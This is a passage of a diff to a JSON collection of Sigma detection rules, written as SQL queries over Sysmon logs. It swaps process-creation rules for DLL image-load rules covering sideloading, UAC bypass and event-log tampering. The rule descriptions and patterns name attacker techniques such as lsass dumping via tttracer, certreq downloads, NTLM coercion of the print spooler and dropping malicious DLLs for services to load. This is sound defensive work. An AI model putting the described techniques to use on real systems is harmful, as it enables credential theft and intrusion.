'%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "status": "test", + "description": 
"Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_parents.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects 
cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ - "Legitimate use" + "Unikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unlikely" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.003" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR Image LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": "48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE 
'\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" ], - 
"filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Suspicious NTLM Authentication on the Printer Spooler Service", - "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", "status": "experimental", - "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", - "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.credential_access", - "attack.t1212" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ntlmrelay.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "PowerShell Base64 Encoded Invoke Keyword", - "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "status": "test", - "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", - 
"author": "pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_invoke.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "Suspicious AgentExecutor PowerShell Execution", - "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". 
One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "TrustedPath UAC Bypass Pattern", - "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "title": "VBA DLL Loaded Via Office Application", + "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "status": "test", - "description": "Detects indicators of a UAC bypass method by mocking directories", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. 
Add the appropriate filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_trustedpath.yml" + "filename": "image_load_office_vbadll_load.yml" }, { - "title": "Suspicious Spool Service Child Process", - "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "status": "test", - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", + "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", + "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "status": "experimental", + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "author": "Markus Neis, @markus_neis", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR 
CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": 
"f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "status": "test", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", 
